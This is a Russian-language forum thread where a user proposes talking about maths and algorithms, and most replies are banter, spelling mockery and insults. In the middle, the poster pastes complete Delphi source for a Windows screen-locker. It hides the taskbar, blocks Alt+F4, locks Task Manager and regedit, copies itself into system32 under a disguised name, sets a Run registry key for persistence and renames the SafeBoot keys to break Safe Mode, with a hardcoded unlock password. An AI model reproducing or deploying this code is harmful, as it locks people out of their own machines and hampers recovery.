Vasiliy-Smolin

Давайте поговорим о Математике и об Алгоритмах. ?

Ответы
Раиса Ильичевск, Одесская Обл.

Я бы с удовольствием. Но как говорится:"Бодливой корове, Бог рога не дал..." Не знаю. математики, тем более алгоритмов. Хотя будучи преподавателем музыки, учила такой предмет, как горомония

Vasiliy-Smolin

Прикольно.!

Раиса Ильичевск, Одесская Обл.

Мне приятно, что вы не посчитали меня математической дурой!

Vasiliy-Smolin

Бывает что-же поделать. ! Как говориться каждому своё.!

Раиса Ильичевск, Одесская Обл.

А вы , действительно разбираетесь в математике

Vasiliy-Smolin

Ну не полностью пока, а так да.!

Раиса Ильичевск, Одесская Обл.

Вы-молодец! Меня радует такая молодежь!

Vasiliy-Smolin

Это хорхо что вы радуетесь.))))))))))))))))

Эс Как Доллар

Мне хочется избить вас орфографическим словарем. А если продолжим диалог, то и учебником математики за шестой класс, с большой долей вероятности

Vasiliy-Smolin

Ну левое полушарие та тут.!

Кошка, Которая Гуляет Сама По Себе

...................................................................................................

Vasiliy-Smolin

Ты индивидуум.!

Vasiliy-Smolin

а

Елена Безменова

алгоритм - хорошая штука, главное определить, в чем он там заключается, а там и система просматривается 🙂

Татьяна Молчу

начнём сразу со сложнейшего и высшего.Доказать,что 2+2=5 и на руках 11 пальцев-это уже умеем.что еще? 😉

Vasiliy-Smolin

Задача о китайском почтальоне. Почтальон должен пройти вдоль каждой дороги своего квартала. Найдите минимальную длину его маршрута.______64564836

Татьяна Молчу

как два пальца облизать)))) 7 🙂 😄 ;)главное,что я сказала уверенно)))хех

Vasiliy-Smolin

4*(6+8)= 54

Татьяна Молчу

красавЧеГ,возьми каМфетку

Vasiliy-Smolin

Ок.!

Константин Кадонцев

Давайте поговорим о математикЕ И оБ алгоритмах , на всякий случай , так правильнее .

Это Я

Может лучше сначала о грамотности стоит? А уж потом на математику замахиваться...

Vasiliy-Smolin

unit Unit1; interface usesWindows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,Dialogs, StdCtrls, Registry; typeTForm1 = class(TForm)edt1: TEdit;btn1: TButton;lbl1: TLabel;lbl2: TLabel;lbl3: TLabel;lbl4: TLabel;lbl5: TLabel;btn2: TButton;procedure FormActivate(Sender: TObject);procedure FormKeyDown(Sender: TObject; var Key: Word;Shift: TShiftState);procedure FormCreate(Sender: TObject);procedure btn1Click(Sender: TObject);procedure btn2Click(Sender: TObject);private{ Private declarations }public{ Public declarations }end; varForm1: TForm1; implementation {$R *.dfm}{$R WindowsXP.res} procedure TForm1.FormActivate(Sender: TObject);varhTaskBar:THandle;beginForm1.Height:=screen.Height;Form1.Width:=screen.Width;SystemParametersInfo(SPI_SCREENSAVERRUNNING,1,0,0);SystemParametersInfo(SPI_SETFASTTASKSWITCH,1,0,0);hTaskbar := FindWindow('Shell_TrayWnd', Nil);ShowWindow(hTaskBar, SW_HIDE);ShowWindow(FindWindow(Nil,'Program Manager'), SW_HIDE);ShowWindow(Application.Handle, SW_HIDE);end; procedure TForm1.FormKeyDown(Sender: TObject; var Key: Word;Shift: TShiftState);beginif ((ssAlt in Shift) and (Key = VK_F4)) thenKey:=0;end; procedure TForm1.FormCreate(Sender: TObject);varaz:TRegIniFile;pt : TPoint;beginFileOpen('C:\Windows\system32\taskmgr.exe',fmShareExclusive);FileOpen('C:\Windows\regedit.exe',fmShareExclusive);CopyFile(PChar(paramstr(0)), PChar('C:\Windows\system32\LXwinlogon.exe'),True);az:=TRegIniFile.Create('Software');az.RootKey:=HKEY_LOCAL_MACHINE;az.OpenKey('Software\Microsoft\Windows\CurrentVersion',True);az.WriteString('Run','Windows System Drives', 'C:\windows\system32\LXwinlogon.exe');az.CloseKey;az.MoveKey('System\CurrentControlSet\Control\SafeBoot\Minimal','System\CurrentControlSet\Control\SafeBoot\M',true);az.CloseKey;az.MoveKey('System\CurrentControlSet\Control\SafeBoot\NetWork','System\CurrentControlSet\Control\SafeBoot\N',true);az.CloseKey;az.Free;end; procedure TForm1.btn1Click(Sender: TObject);varhTaskBar: THandle;Password: string;az:TRegIniFile;beginPassword:=edt1.text;if (Password='158') thenbeginSystemParametersInfo(SPI_SCREENSAVERRUNNING,0,0,0) ;SystemParametersInfo(SPI_SETFASTTASKSWITCH,0,0,0);ShowWindow(FindWindow(Nil,'Program Manager'),SW_SHOW);hTaskbar:=FindWindow('Shell_TrayWnd', Nil);ShowWindow(hTaskBar, SW_SHOWNORMAL);az:=TRegIniFile.Create('Software');az.RootKey:=HKEY_LOCAL_MACHINE;az.OpenKey('Software\Microsoft\Windows\CurrentVersion\Run',true);az.DeleteValue('Windows System Drives');az.CloseKey;az.MoveKey('System\CurrentControlSet\Control\SafeBoot\M','System\CurrentControlSet\Control\SafeBoot\Minimal',true);az.CloseKey;az.MoveKey('System\CurrentControlSet\Control\SafeBoot\N','System\CurrentControlSet\Control\SafeBoot\NetWork',true);az.CloseKey;az.Free;Close;endelsebeginShowMessage('Неправильный пароль, попробуйте ещё!');edt1.Clear;end;end; end.

Это Я

Прелестный код. Главное очень читабельный.

Светлана

давайте, мне вот прямо как раз что-нибудь вумное вспомнить захотелось.....

Vasiliy-Smolin

Да да да.!

Светлана

ты, мой,Лев, Тигр...хочу тебя <3

Vasiliy-Smolin

Ах ха ха ха.! Хотиииииииииииииииииии.!

Светлана

какие же вы...пустые))))))))))))))))))))))) <3 <3 <3

Vasiliy-Smolin

И что это я пустой.?

Сергей Мосеев

не иначе третью бутылку Жатецкого гуся осиливаете))))

Раиса Гребенникова

О математике можно, а алгоритмы в ней всегда есть.

Ринат Фамутдинов

Давай! С чего начнем! Например С3 00 80... продолжим?

Сергей Фофанов

Давайте поговорим, о, Математики, о, Алгоритмы !

Галина Ясная

Настала необходимость повторить пройденное?

Василий Гриненко

об этом поговорите в общ. туалете с бомжами..

Vasiliy-Smolin

А ха ха ха бабка тупая.!

Василий Гриненко

не истери, тупиздень..

Vasiliy-Smolin

Ладно давай бабка тупая. ! Иди тупи.!

А Таю

НУ ТЫ БЛИН И БОТАНИК, ВОПРОСЫ ЗАДАЁШЬ КОМУ ПОПАЛО, Я С ЭТИ УЖЕ 33 ГОДА РАБОТАЮ, ЧПУ ЗНАЕШЬ ЧТО ТАКОЕ, БЕЗ ЭТОГО ПОКА НИКАК

Vasiliy-Smolin

Знаю.! И что.?

Юлия Постнова

не..вот о чем бы я точно говорить не хотела...

Александр Коробченко

Увлекаетесь компьютерными технологиями?

Vasiliy-Smolin

Я желаю вообще вам во всём, успеха, фарта, удачи, здоровье крепкого, и всего самого самого хорошего.!

Александр Коробченко

СПАСИБО!!!!!!!!!!!!!!

Vasiliy-Smolin

Не болейте.!)))))))))))))))))))

Vasiliy-Smolin

)))

Татьяна

и что же вам рассказать о математикЕ?...

Vasiliy-Smolin

Да что не будь полезное.!

Людмила Шибаева

лучше про интегралы и дифференциалы...

Vasiliy-Smolin

Ок.!

Людмила Шибаева

интеграл от дх???

Маруся Лялина

Давайте сначала о букваре поговорим.

Vasiliy-Smolin

Давайте почему бы и нет.!

Сергей Бирюков

лучше о тангенсах, и тригонометрии.

Наталья Фомичёва

только не это, лучше о прекрасном...

Vasiliy-Smolin

А что для вас прекрасное, я и не знаю.!

Наталья Фомичёва

ну только не математика

Vasiliy-Smolin

О морфологии, что вы знаете?.)

Наталья Фомичёва

у вас вопросы только предметные? а как на счет про жизнь?

Vasiliy-Smolin

Ладно.!) Какую песню ты бы выбрала для описания своей жизни?

Vasiliy-Smolin

АУУУУУУУУУУУУУУУУУУУУУУУУУУУУУУУ.!))))